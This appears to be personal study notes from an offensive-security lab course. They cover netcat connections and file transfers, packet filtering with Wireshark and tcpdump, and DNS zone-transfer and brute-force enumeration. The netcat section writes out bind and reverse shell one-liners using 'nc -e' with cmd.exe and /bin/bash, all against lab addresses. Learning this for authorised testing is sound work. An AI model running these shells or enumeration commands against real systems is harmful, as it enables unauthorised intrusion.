NETCAT
→ connect to:
nc -n (skip dns) -v 10.11.0.22 110
→ rdp to pc
rdesktop 10.11.0.22 -u offsec -p lab -g 1024x768 -x 0x80
→ configure nc listener on a pc
nc -nvlp 4444
→ connect to the pc with nc
nc -nv 10.11.0.22 4444
→ transfer files to / create a listener on pc
nc -nvlp 4444 > incoming.exe
→ create connection from linux
locate wget.exe
nc -nv 10.11.0.22 4444 < <locate result>
→ remote administration
- from PC
nc -nlvp 4444 -e cmd.exe
- linux
nc -nv 10.11.0.22 4444
→ reverse shell
win pc
nc -nlvp 4444
linux
nc -nv 10.11.0.22 4444 -e /bin/bash
wireshark
net filter → net 10.11.1.0/24
display filter → tcp port == 21
tcpdump
sudo tcpdump -n -r password_cracking_filtered.pcap | awk -F “ ” ‘{print $3}’ | sort | uniq -c | head
sudo tcpdump -n src host 172.16.40.10 -r password_cracking_filtered.pcap
sudo tcpdump -n dst host 172.16.40.10 -r password_cracking_filtered.pcap
sudo tcpdump -n port 81 -r password_cracking_filtered.pcap
sudo tcpdump -nX -r password_cracking_filtered.pcap | less
→ read the header of the packet and look for ACK and GET
sudo tcpdump -A -n ‘tcp[13] = 24’ -r password_cracking_filtered.pcap
RELEVANT TOOLS IN KALI
- DNSCON
dnsrecon -d megacorpone.com -t axfr (to do a zone transfer)
dnsrecon -d megacorpone.com -D ~/list.txt -t brt (to do a brute force enum)
- DNSENUM
dnsenum zonetransfer.com
PREVIOUSpractical examples